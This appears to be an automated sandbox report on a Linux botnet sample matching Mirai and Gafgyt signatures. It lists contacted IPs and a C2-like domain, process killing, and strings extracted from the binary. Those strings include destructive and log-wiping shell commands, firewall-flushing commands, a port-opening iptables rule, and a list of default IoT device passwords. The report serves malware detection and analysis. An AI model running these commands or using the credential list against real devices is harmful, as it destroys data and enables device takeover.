      Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
      Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
      Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
      Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
      Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
      Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
      Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
      Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 94.16.114.254
      Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
      Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
      Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
      Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
      Source: unknownUDP traffic detected without corresponding DNS query: 91.217.137.37
      Source: unknownUDP traffic detected without corresponding DNS query: 51.77.149.139
      Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
      Source: global trafficDNS traffic detected: DNS query: octopus1337.geek

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Sample tries to kill multiple processes (SIGKILL)
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5588, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5632, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5587, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5616, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5638, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5680, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5635, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5636, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5685, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5713, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5683, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5708, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5731, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5733, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5735, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5734, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5790, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5801, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5832, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5851, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 800, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 803, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1364, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1369, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1371, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1383, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1394, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1560, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1564, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1567, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1577, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1588, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1593, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1610, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1630, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1633, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1635, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1638, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1639, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1640, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1642, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1647, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1650, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1653, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1655, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1659, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1661, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1683, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1712, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1717, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 2946, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 2997, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 2999, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3120, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3129, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3142, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3147, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3184, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3187, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3188, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3189, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3190, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3193, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3207, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3215, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3235, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3245, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3246, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3268, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3304, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3319, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3329, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3341, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3353, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3361, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3392, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3398, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3402, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3406, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3412, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3425, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3688, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5507, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5732, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5776, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5786, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5787, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5777, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5822, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5868, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5874, result: successfulJump to behavior
      Source: Initial sampleString containing 'busybox' found: pkill -9 busybox
      Source: Initial sampleString containing 'busybox' found: x86.32rm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stopservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp/sbin/iptables -F; /sbin/iptables -X
      Source: Initial sampleString containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
      Source: Initial sampleString containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
      Source: Initial sampleString containing 'busybox' found: /dev/watchdog/dev/misc/watchdogPon521rootZte521root621oelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_jat0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantechdreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123ipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxpasswordsupportadmintelnetadminadmintelecomguestftpusernobody1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i thinkbindtoipconnectpoll/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPTb^
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5588, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5632, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5587, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5616, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5638, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5680, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5635, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5636, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5685, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5713, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5683, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5708, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5731, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5733, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5735, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5734, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5790, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5801, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5832, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5556)SIGKILL sent: pid: 5851, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 800, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 803, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1364, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1369, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1371, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1383, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1394, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1560, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1564, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1567, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1577, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1588, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1593, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1610, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1630, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1633, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1635, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1638, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1639, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1640, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1642, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1647, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1650, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1653, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1655, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1659, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1661, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1683, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1712, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 1717, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 2946, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 2997, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 2999, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3120, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3129, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3142, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3147, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3184, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3187, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3188, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3189, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3190, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3193, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3207, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3215, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3235, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3245, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3246, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3268, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3304, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3319, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3329, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3341, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3353, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3361, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3392, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3398, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3402, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3406, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3412, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3425, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 3688, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5507, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5732, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5776, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5786, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5787, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5777, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5822, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5868, result: successfulJump to behavior
      Source: /tmp/x86.elf (PID: 5557)SIGKILL sent: pid: 5874, result: successfulJump to behavior
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
